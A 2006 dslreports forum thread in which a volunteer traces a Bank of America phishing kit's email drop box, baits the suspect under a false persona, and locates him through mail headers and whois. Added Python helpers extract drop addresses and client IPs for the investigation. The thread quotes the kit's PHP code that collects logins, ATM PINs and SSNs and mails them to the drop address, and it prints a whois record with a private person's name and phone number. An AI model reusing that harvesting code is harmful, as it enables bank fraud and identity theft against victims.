[Phishing] Bank of America Phish, caught work in progress. (dslreports.com Security » Spam, Scam and Phishbusters forum)
MGD
Premium,MVM
join:2002-07-31
Fort Lauderdale, FL


reply to MGD
Re: [Phishing] Bank of America Phish, caught work

Interesting follow up:

Though the digging through phishes looking for and extracting the email drop boxes is both tedious and time consuming, what irks me the most is the failure of the majors to yank the accounts despite frequent larts. If these drop box accounts were pulled promptly, it would prevent the phished data from being recovered. Now that most of the email providers have forsaken the abuse@ and gone to online forms for complaints (Gmail, Yahoo etc.), they have no easy method for reporting them. Getting clueless replies requesting the email headers from the "offending account", despite including snippets from the code clearly identifying the email address as part of a scam, is frustrating. By the time the issue is escalated to a clued rep, the data is long gone.

With that in mind, I sometimes go back a few weeks afterwards and recheck the drop accounts to see if they were cancelled. In addition to using RCPT TO at the MX server, I also send an email to the address to see if it bounces. I usually include some benign reference to the phish to see if I can elicit a response, and every now and then I get one.

Two days ago I tested the purisangeh_team@yahoo.com drop box on this BOA phish, now over a month old. I always want to include some trigger in the subject line to try and get attention. In this case I listed the subject as "KASKUS", which is an Indonesian chat forum that was one of the few places where the name Purisangeh had turned up as a poster: »www.kaskus.com/member.php?u=69571 Indonesia became a focus since a previous identical BOA phish, which was reported in NANAS on 12/05, was also emailed via the exact same open proxy as this one: »groups.google.com/group/news.adm···e0261745 Coincidentally that phish site was hosted on a hijacked box in Indonesia.

So I sent off the following email to the phish drop box:


From: Macs Retsub
To: purisangeh_team@yahoo.com
Date: Feb 1, 2006 5:53 PM
Subject: Kaskus

Hey, I still have the files from the Bank of America phish.
The address rdcpt0809@airpost.com is dead.
Which other one can I use??

I have the logs too.



I try to make them fuzzy, but throw in a few clues, and hope they respond with their guard down. Well about 24 hours later in pops this:


From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 4:06 AM
Subject: Re: Kaskus

What are you talking about???



Ahh, got a hit !! so I responded with some more info, and included a snippet of the BOA phish processing script showing the data collection address.


From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 12:16 PM
Subject: Re: Kaskus

The data from the credit card and BOA scam:
Some of the logs were sent to me by mistake??


if(isset($atm_number) || isset($pin))
{ if(!ereg("^[0-9]+$",$atm_number) || !ereg("^[0-9]+$",$pin))
{ header("Location: GotoErrorVerifyPage.htm"); return FALSE;} }

session_start();

//USER ACCOUNT

$D1 = $_POST['D1'];
$online_id = $_POST['online_id'];
$passcode = $_POST['passcode'];
$repasscode = $_POST['repasscode'];
$email = $_POST['email'];
$atm_number = $_POST['atm_number'];
$pin = $_POST['pin'];

//SECURITY QUESTION

$ssn1 = $_POST['ssn1'];$ssn2 = $_POST['ssn2'];$ssn3 = $_POST['ssn3'];
$ip = $_SERVER["REMOTE_ADDR"];

$subj = "Full Info BoA ip :$ip";
$msg = "Full Info From ip :$ip
\nUSER ACCOUNT
\n-------------------
\n\nAccount open in : $D1\nOnline ID : $online_id\nPasscode : $passcode\nLast 8 Digit ATM : $atm_number\nATM PIN : $pin\nEmail : $email
\n\nSECURITY QUESTION
\n---------------------
\n\nS S N : $ssn1-$ssn2-$ssn3";

$from = "From: BoA<support@PlatinumBank.com>";
$to = " purisangeh_team@yahoo.com";

I thought that it may break the ice!! or lose him. However, he responded:


From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 1:28 PM
Subject: Re: Kaskus

By the way who are you and what is your business. I just signed up this email for 2 weeks ago. Maybe you made a mistake of contact to person that you mentioned. Please let me know what can I do for you??

Regard,

Huge



Well! that's a big lie. As I posted above, I checked the address at the time of posting the dig and it was valid, and I also checked it several times afterwards. Yahoo could not have recycled it in a 48 hour period. Besides, is there a waiting list for Purisangeh_Team at Yahoo? In addition the script files that contained the addy were dated ~12/25. So I responded:


From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 2:05 PM
Subject: Re: Kaskus

You need to check again, this account was active on or before January 1, 2006, who is in the "Team" ??



Within twenty minutes I get this back:


From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 2:24 PM
Subject: Re: Kaskus

How you can check it? and who are you? why you investigate me like police? i am musician in New Zealand. Purisangeh is my Group Band Name. What you want ask from me again??



Now I am thinking, is this guy an intern for the Purisangeh Team or what? I had my red push pin stuck in Jakarta on my world map. Now he says that he is in New Zealand. Well, he lied about the two week old email address, so I checked on his honesty by having a look at the mail headers.

X-Gmail-Received: b633b5e5f8108d9d26a619a897e71f68e0d6477a
Delivered-To: *******@gmail.com
Received: by 10.48.248.4 with SMTP id v4cs6897nfh;
Thu, 2 Feb 2006 01:06:55 -0800 (PST)
Received: by 10.54.128.14 with SMTP id a14mr2115170wrd;
Thu, 02 Feb 2006 01:06:55 -0800 (PST)
Return-Path:
Received: from web32002.mail.mud.yahoo.com (web32002.mail.mud.yahoo.com [68.142.207.99])
by mx.gmail.com with SMTP id 11si5302468wrl.2006.02.02.01.06.54;
Thu, 02 Feb 2006 01:06:55 -0800 (PST)
Received-SPF: pass (gmail.com: domain of purisangeh_team@yahoo.com designates 68.142.207.99 as permitted sender)
DomainKey-Status: good (test mode)
Received: (qmail 29227 invoked by uid 60001); 2 Feb 2006 09:06:47 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
s=s1024; d=yahoo.com;
h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
Message-ID:
Received: from [222.124.19.29] by web32002.mail.mud.yahoo.com via HTTP; Thu, 02 Feb 2006 01:06:46 PST
Date: Thu, 2 Feb 2006 01:06:46 -0800 (PST)
From: ariando huge
Subject: Re: Kaskus
To: Macs Retsub


I then did a lookup of IP 222.124.19.29

Location: Indonesia (high) [City: Jakarta, Jakarta Raya (Djakarta Raya)]
inetnum: 222.124.19.16 - 222.124.19.31
netname: TLKM_D3_AST_DUYA_MEDIA
country: ID
descr: PT. DUYA MEDIA
descr: Public Internet Cafe
descr: Jl. Buah Batu No. 165D
descr: Bandung
admin-c: KI32-AP
tech-c: KI32-AP
remarks: ------------------------------------------------------------------
remarks: Send ABUSE and SPAM reports with plain ASCII text only to
remarks: **********@yahoo.com cc to *****@telkom.net.id
remarks: The netname enclosed in square bracket is included in the subject.
remarks: ------------------------------------------------------------------
status: ASSIGNED NON-PORTABLE
changed: ****@telkom.co.id 20050725
mnt-by: MAINT-TELKOMNET
source: APNIC

person: KHAIRIL IMAMI
nic-hdl: KI32-AP
e-mail: **********@yahoo.com
address: Jl. Buah Batu No. 165D
address: BANDUNG
phone: +62227319398
country: ID
changed: ****@telkom.co.id 20050718
mnt-by: MAINT-TELKOMNET
source: APNIC


Ha ha, "huge ariando" you are right where I thought you were, and in an internet cafe no less in downtown Bandung, which is the capital city of West Java Province, about 100 miles southeast of Jakarta. Not exactly New Zealand, so I wrote:


From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 2:53 PM
Subject: Re: Kaskus

Then why are you now at an Internet Cafe in Bandung?? are you on holidays?
What kind of music do you play? what does Purisangeh mean?



I didn't want to blow him away, I wanted to keep him going, so I included an out!
Then I got this:


From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 3:39 PM
Subject: Re: Kaskus

I still do not understand with you. I am Jazz Musician. We are in concert here since 28 january. Listen to me, now i really feel annoyed because of you. I dont know you and you not tell me who you are? So stop email me anonymous person.

BYE.



Ouch!! yes I am sort of anonymous, my email is not traceable. I don't want to lose him just yet, so I take a five minute refresher course in geography. There are several universities in Bandung, I suspect he may be a student. I try to get him back by alluding to being right there, and throw some local names in.


From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 4:26 PM
Subject: Re: Kaskus

Please, do not be annoyed, I like Jazz music too, more progressive though, I am a big fan of DISCUS. Where are you playing at ? the Savoy? maybe I can attend a concert, I checked the papers and I don't see any adverts. Maybe you can come back from New Zealand and play at one of the festivals at Bale Ayer in Taman Ria Senayan in Jakarta, have you ever been there? Try and visit Saung Mang Udjo while you are here. How many are in your band? What instrument do you play?



Wow!! it took all of 4 minutes to get a reply. Boy, he sure spends a lot of time on the web in an internet cafe for an on tour "in concert jazz musician".


From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 4:30 PM
Subject: Re: Kaskus

are you indonesian?? " Apa Kabar? " Why you know all about indonesian place? can you chat with me on yahoo messenger? My ID is homebeautypink. I am online now.

Regard,

Huge



Well that sure brought him right back, and he is a homeboy, look at that, from a New Zealander to "Apa kabar" all in a few messages. Well I looked it up:
The phrase "apa kabar" literally means "what (your) news". ... To answer "apa kabar", we usually use "baik" or "baik-baik" to indicate that it's good

I never replied to the "invitation" as I would have to use a nearby proxy, plus I am now stuck language-wise. I decided to preserve my options, and sleep on it.
I really just want to get an answer to "What the F**k did you do with all the credit card data that came streaming into that account, and what other scams are now ongoing?"

MGD

Edit=typo+formatting
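A small extractor for the drop-box hunting described at the top of the post (finding where a kit's processing script mails the harvested data), as an added example and not the poster's own tool. The kit fragment it runs over is a constructed sample modelled on the quoted snippet; the variable $to2 and the address backup_drop@example.com are invented for illustration.

```python
import re

# Constructed sample in the style of the kit fragment quoted in the post.
# It is not the real kit file: $to2 and backup_drop@example.com are invented.
SAMPLE_KIT = r'''<?php
session_start();
$online_id = $_POST['online_id'];
$passcode = $_POST['passcode'];
$ip = $_SERVER["REMOTE_ADDR"];
$subj = "Full Info BoA ip :$ip";
$msg = "Online ID : $online_id\nPasscode : $passcode";
$from = "From: BoA<support@PlatinumBank.com>";
$to = " purisangeh_team@yahoo.com";
$to2 = "rdcpt0809@airpost.com";
mail($to, $subj, $msg, $from);
mail("backup_drop@example.com", $subj, $msg, $from);
header("Location: GotoErrorVerifyPage.htm");
?>'''

EMAIL_RE = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}')
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"')   # $name = "literal";
MAIL_RE = re.compile(r'\bmail\s*\(\s*([^,]+),')      # first argument of mail()


def find_drop_boxes(src):
    """Addresses the kit mails harvested data to (recipients only, not From:)."""
    literals = dict(ASSIGN_RE.findall(src))
    drops = set()
    for arg in MAIL_RE.findall(src):
        arg = arg.strip()
        # A variable is resolved through its string assignment; a literal is used as is
        value = literals.get(arg[1:], '') if arg.startswith('$') else arg
        drops.update(EMAIL_RE.findall(value))
    # Kits often keep spare recipients in $to, $to2 ... even when unused in this file
    for name, value in literals.items():
        if name.lower().startswith('to'):
            drops.update(EMAIL_RE.findall(value))
    return drops


def harvested_fields(src):
    """Form fields the kit copies out of $_POST, i.e. what victims are asked for."""
    return sorted(set(re.findall(r"\$_POST\['(\w+)'\]", src)))


if __name__ == '__main__':
    print('drop boxes :', sorted(find_drop_boxes(SAMPLE_KIT)))
    print('harvested  :', harvested_fields(SAMPLE_KIT))
```

The From: address is deliberately left out of the result, since it is the spoofed sender and not where the data goes.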


Ummmyea

@208.17.x.x
How is your email not traceable?


pleekmo
Triptoe Through The Tulips
Premium
join:2001-09-14
Manchester, CT

said by Ummmyea :

How is your email not traceable?
Anonymous re-mailer, perhaps.
--
HCN: Because you deserve a rest!

I wonder what Spock would have to say (or do) about Omelas?


tapeloop
1959. I try to kick the ball. I miss.
Premium
join:2004-06-27
Airstrip One

 reply to MGD
MGD, more power to you my brother. I wish I knew Bahasa so I could help you slam dunk this guy. Keep up the good work and keep us posted.
--
Copyright infringement is illegal. Murder is illegal. Therefore, file sharing is murder.

MGD
Premium,MVM
join:2002-07-31
Fort Lauderdale, FL


Re: [Phishing] Bank of America Phish, caught work

I guess someone must have sent you a "HEADS UP"

said by purisangeh :

Thank you Macs Retsub for your Big mouth ...... You want be a hero here?

Hey that's only a small price that you pay for being a thief and a criminal. Nope, I am not a hero, I just volunteer my time and forensic cyber skills to try and prevent victims from being defrauded.

You are now a member, read my scam hunting posts. I am an "equal opportunity" scam hunter. I follow the trail wherever it leads. Scammers are everywhere, they come in all shapes, sizes, and religions.

said by purisangeh :

....You do not have enough proof to catch me....

Don't bet on it junior!!! Maybe you will read an article about this in your local paper Pikiran Rakyat. I am sure that the people of Bandung do not like thieves any more than we do.

said by purisangeh :

I hope I can see you as soon as possible, to discuss our future....

Sure, just so long as your future includes paying a price for your crimes. I have found your fingerprints on many other phishes, so you have been doing this for a while.

said by purisangeh :

I can create all software using Delphi, Php, Asp, Visual Basic, C++. I am not studying in any university yet.....

Great, so why are you using those skills to commit crimes instead of doing productive work? Will the universities let you in if they know what you are doing?

Do not be an idiot and bring race and religion into to it. You are a criminal, you got busted !! Face up to it junior..

You spend a lot of time at that Internet Cafe, do you work or live there?? Your emails came from 3 different IP's at the Cafe within a few hours.

MGD

Edit+added link
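The header check from the earlier post, which is also how the three cafe IPs mentioned above would be pulled out of the later replies: Yahoo's webmail hop records the browser's IP in its "from [a.b.c.d] ... via HTTP" Received line, and the Received-SPF field confirms the message really came through Yahoo's servers. This is an added example, not the poster's own tool; the header block is a constructed copy of the quoted one with the redacted fields left out.

```python
import ipaddress
import re

# Constructed header block modelled on the one quoted in the earlier post;
# the Delivered-To and Message-ID fields are omitted, as they are redacted there.
SAMPLE_HEADERS = """\
Received: by 10.48.248.4 with SMTP id v4cs6897nfh;
        Thu, 2 Feb 2006 01:06:55 -0800 (PST)
Received: from web32002.mail.mud.yahoo.com (web32002.mail.mud.yahoo.com [68.142.207.99])
        by mx.gmail.com with SMTP id 11si5302468wrl.2006.02.02.01.06.54;
        Thu, 02 Feb 2006 01:06:55 -0800 (PST)
Received-SPF: pass (gmail.com: domain of purisangeh_team@yahoo.com designates 68.142.207.99 as permitted sender)
Received: (qmail 29227 invoked by uid 60001); 2 Feb 2006 09:06:47 -0000
Received: from [222.124.19.29] by web32002.mail.mud.yahoo.com via HTTP; Thu, 02 Feb 2006 01:06:46 PST
Date: Thu, 2 Feb 2006 01:06:46 -0800 (PST)
From: ariando huge <purisangeh_team@yahoo.com>
Subject: Re: Kaskus
"""

IPV4 = r'(\d{1,3}(?:\.\d{1,3}){3})'


def unfold(headers):
    """Join folded continuation lines so each header field is one string."""
    return re.sub(r'\n[ \t]+', ' ', headers).splitlines()


def received_chain(headers):
    """Received: fields oldest hop first (each relay prepends its own on top)."""
    hops = [f[len('Received:'):].strip() for f in unfold(headers)
            if f.lower().startswith('received:')]
    return hops[::-1]


def spf_designated_ip(headers):
    """IP that Received-SPF says the sender domain designated, or None."""
    m = re.search(r'(?im)^Received-SPF:.*?designates ' + IPV4, '\n'.join(unfold(headers)))
    return m.group(1) if m else None


def webmail_client_ip(headers):
    """Client IP recorded by a webmail hop ('from [a.b.c.d] ... via HTTP').
    Only a public address is reported; private ones are relay internals."""
    for hop in received_chain(headers):
        if 'via HTTP' in hop:
            m = re.search(r'from \[' + IPV4 + r'\]', hop)
            if m and ipaddress.ip_address(m.group(1)).is_global:
                return m.group(1)
    return None
```

Run over each reply in turn, webmail_client_ip gives the per-message cafe address that a whois lookup (as in the post) then places.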
© 1999-2009 dslreports.com